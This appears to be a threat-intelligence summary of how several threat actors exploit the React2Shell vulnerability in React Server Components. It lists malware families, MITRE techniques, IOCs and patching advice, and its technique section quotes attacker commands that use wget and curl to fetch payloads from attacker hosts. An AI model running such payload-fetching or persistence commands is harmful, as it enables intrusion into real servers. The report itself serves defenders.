Threat Research

Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) | Google Cloud Blog

Securonix
Multiple Threat Actors Exploit React2Shell (CVE-2025-55182) | Google Cloud Blog

GTIG observed widespread exploitation of CVE-2025-55182 (React2Shell) leading to deployment of MINOCAT, SNOWLIGHT, HISONIC, COMPOOD, ANGRYREBEL.LINUX, and XMRIG across multiple threat clusters including China-nexus espionage and financially motivated actors. Defenders are advised to patch affected React Server Components, deploy WAF rules, audit dependencies, monitor for specific IOCs and hunt for persistence artifacts like hidden directories, cron jobs, systemd services, and modified shell configs. #CVE-2025-55182 #MINOCAT #SNOWLIGHT #HISONIC #COMPOOD #XMRIG #UNC6600

Keypoints

  • GTIG confirmed CVE-2025-55182 (React2Shell) is a critical unauthenticated RCE in React Server Components with widespread exploitation after public disclosure.
  • Multiple China-nexus clusters (e.g., UNC6600, UNC6586, UNC6588, UNC6603, UNC6595) and financially motivated actors exploited the vulnerability to deploy tunneler, backdoors, downloaders, and cryptominers.
  • Observed malware families and tools include MINOCAT (FRP-based tunneler), SNOWLIGHT (VSHELL downloader), HISONIC (cloud-service-backed backdoor), COMPOOD backdoor, ANGRYREBEL.LINUX, and XMRIG miner.
  • Common post-exploitation behaviors: use of wget/curl to fetch payloads, creation of hidden directories ($HOME/.systemd-utils), killing processes (ntpclient), establishing persistence via cron jobs and systemd services, and modifying shell configs.
  • GTIG published YARA rules and IOCs (domains, IPs, SHA256 hashes, filenames) and recommends immediate patching to fixed React Server Components versions and deploying Cloud Armor WAF rules as mitigation.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – Vulnerability exploited via an unauthenticated HTTP request that executes arbitrary code: ‘The flaw allows unauthenticated attackers to send a single HTTP request that executes arbitrary code with the privileges of the user running the affected web server process.’
  • [T1105 ] Ingress Tool Transfer – Attackers used wget/curl to retrieve and execute payloads: ‘curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/… -o ‘ and ‘wget http://45.76.155[.]14/vim -O /tmp/vim’
  • [T1053.005 ] Scheduled Task/Job: cron – Persistence via creation of cron jobs: ‘establish persistence by creating a new cron job and a systemd service and by inserting malicious commands into the current user’s shell config to execute MINOCAT whenever a new shell is started.’
  • [T1543.003 ] Create or Modify System Process: Systemd service – Persistence via systemd service creation: ‘establish persistence by creating a new cron job and a systemd service…’
  • [T1036 ] Masquerading – Malware disguised as legitimate binaries (e.g., Vim or sshd) to evade detection: ‘the script then executed the COMPOOD sample, which masqueraded as Vim’ and ‘masquerading the malware as the legitimate OpenSSH daemon (sshd) within the /etc/ directory.’
  • [T1070 ] Indicator Removal on Host – Anti-forensics and timestamp manipulation to hinder detection: ‘the actor also employs timestomping to alter file timestamps and executes anti-forensics commands, such as clearing the shell history (history -c).’
  • [T1102 ] Web Service – Use of legitimate cloud-hosted services for command-and-control and configuration retrieval: ‘HISONIC backdoor that utilizes legitimate cloud services, such as Cloudflare Pages and GitLab, to retrieve its encrypted configuration.’
  • [T1071.001 ] Application Layer Protocol: Web Protocols – C2 communications and staged payload retrieval over HTTP(S): ‘SNOWLIGHT making HTTP GET requests to C2 infrastructure (e.g., reactcdn.windowserrorapis[.]com) to retrieve additional payloads…’
  • [T1090 ] Proxy – Use of tunneling/proxying tools to route traffic and enable remote access: ‘MINOCAT is an 64-bit ELF executable for Linux that includes a custom “NSS” wrapper and an embedded, open-source Fast Reverse Proxy (FRP) client that handles the actual tunneling.’

Indicators of Compromise

  • [Domain ] SNOWLIGHT C2 and staging – reactcdn.windowserrorapis[.]com
  • [IP Address ] SNOWLIGHT and staging servers – 82.163.22[.]139, 216.158.232[.]43 (staging for sex.sh)
  • [IP Address ] COMPOOD C2 and payload staging – 45.76.155[.]14
  • [SHA256 ] HISONIC samples – df3f20a961d29eed46636783b71589c183675510737c984a11f78932b177b540, 92064e210b23cf5b94585d3722bf53373d54fb4114dca25c34e010d0c010edf3
  • [SHA256 ] Other observed payloads – 0bc65a55a84d1b2e2a320d2b011186a14f9074d6d28ff9120cb24fcc03c3f696 (ANGRYREBEL.LINUX), 13675cca4674a8f9a8fabe4f9df4ae0ae9ef11986dd1dcc6a896912c7d527274 (XMRIG downloader, filename: sex.sh)
  • [SHA256 ] SNOWLIGHT and MINOCAT samples – 7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a (SNOWLIGHT, filename: linux_amd64), 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273 (MINOCAT)
  • [Filename ] Download scripts and binaries – sex.sh (XMRIG downloader), linux_amd64 (SNOWLIGHT payload)

Read more: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint